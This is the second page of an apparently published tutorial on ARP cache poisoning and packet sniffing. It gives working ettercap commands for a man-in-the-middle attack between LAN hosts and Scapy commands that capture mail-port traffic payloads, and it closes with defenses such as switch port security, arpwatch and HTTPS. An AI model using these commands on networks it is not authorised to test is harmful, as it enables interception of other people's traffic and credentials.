« Previous 1 2
Arp Cache Poisoning and Packet Sniffing
Logging Data
If you would like to log all the packets in a file, you can use a number of different tools, such as p0f, which is a versatile passive OS fingerprinting and masquerade detection utility. Use p0f for evidence or information gathering on servers, firewalls, and intrusion detection systems. Ettercap can also fingerprint hosts (find the Operating System running) with the -P option; you just need to specify an open port. Once you find out what operating system is running on the target system, you can anticipate how the system will react:
# ettercap -Tq -P finger /192.168.1.121/22
To allow the p0f utility to write packets to a tcpdump snapshot, use the -w option.
p0f -w dumpfile.pcap
Dsniff is another tool in the dsniff collection described earlier in this article. Use the following command to write packets to file.
dsniff -w dumpfile.pcap
Ettercap allows dumping packet data to file with the -w option as well.
ettercap -T -M arp:remote /192.168.1.1/ /192.168.1.130/ -w dumpfile.pcap
It is easier and less intrusive if you sniff the traffic of a specific computer, rather than trying to sniff the whole LAN segment. Otherwise you might crash ettercap.
You can then view the output in Scapy (http://www.secdev.org/projects/scapy/), if you have a graphical PostScript/PDF. Scapy is a powerful interactive packet manipulation program that has the ability to forge or decode packets of a wide number of protocols. You can use Scapy to perform tasks such as scanning, tracerouting, probing, unit tests, network discovery, tcpdump, tethereal, p0f and much more. Start by typing scapy at the terminal prompt:
$ scapy
>>> a=rdpcap(“/home/cr0wn/dumpfile.pcap”)
>>> a
<dumpfile.pcap: TCP:9522 UDP:2386 IMCP:15 Other:611>
>>> a[423].pdfdump(layer_shift=1)
If you want to sniff traffic on a host, give Scapy the following command:
>>> sniff(filter=”tcp and host 192.168.1.131”, count=50)
>>> a=_
>>> a.nsummary()
This command sniffs the next 50 packets traveling the network on the host 192.168.1.131 (see Figure 1).
If you use the sprintf() function, you can get even more control over what is displayed.
>>> pkts = sniff(prn=lambda x:x.sprintf(“{IP:%IP.src% → %IP.dst%\n}{Raw:%Raw.load%\n}”))
You can narrow down the ports that you sniff, as port 25 and 110 -- common ports for mail clients. Enter the following command in Scapy:
>>> a=sniff(filter=”tcp and ( port 25 or port 110 )”,
prn=lambda x: x.sprintf(%IP.src%:TCP.sport% → \ %IP.dst%:%TCP.dport% %2s,TCP.flags% : %TCP.payload%”))
The preceding command sniffs for TCP on ports 25 and 110 and uses the lambda operator, to denote anonymous functions, with the sprintf() function for more control over displayed information.
Scapy can also graph what you are sniffing on the network by producing a simple diagram of packet flow. The conversations() method will create a conversation graph, which requires graphviz and ImageMagick to work. The following command uses Scapy to sniff the wireless interface (wlan0) that is connected to a foreign network, all displayed in a graphic format.
>>> a=sniff(iface=”wlan0”, prn=lambda x: x.summary())
>>> a.conversations()
Conclusion
ARP Cache Poisoning allows any computer on the local area network to obtain one of the most powerful attack postures in network security called “Man in the Middle” (MITM). MITM is able to monitor, filter, modify and edit any and all network traffic moving between LAN's. This article identified some open source tools that you can use to test your networks susceptibility to an arp cache MITM attack. By making yourself familiar with these tools, you can see how secure your network really is.
A good defense against these techniques is to provide port security integrated into your switches and to run arpwatch (http://linuxcommand.org/man_pages/arpwatch8.html) to monitor address resolution protocol traffic on your network.
One way to protect network clients that engage in web browsing is to use HTTPS Everywhere (https://www.eff.org/https-everywhere) by the Electronic Frontier Foundation (EFF). HTTPS Everywhere lets a connection to supporting websites use https instead of ordinary http, which passes information in clear-text and would be read by an attacker that is sniffing the local network segment.
The Author
David J. Dodd holds a current Top Secret DoD Clearance and is available for consulting on various Information Assurance projects. A former US Marine with an Avionics background in Electronic Countermeasures Systems, David has given talks at the San Diego Regional Security Conference and SDISSA. He is a member of InfraGard and contributes to Securing Our eCity (http://securingourecity.org). He works for pbnetworks Inc. (http://pbnetworks.net), a service-disabled-veteran–owned business located in San Diego, CA. You can contact him by emailing dave@pbnetworks.net.
« Previous 1 2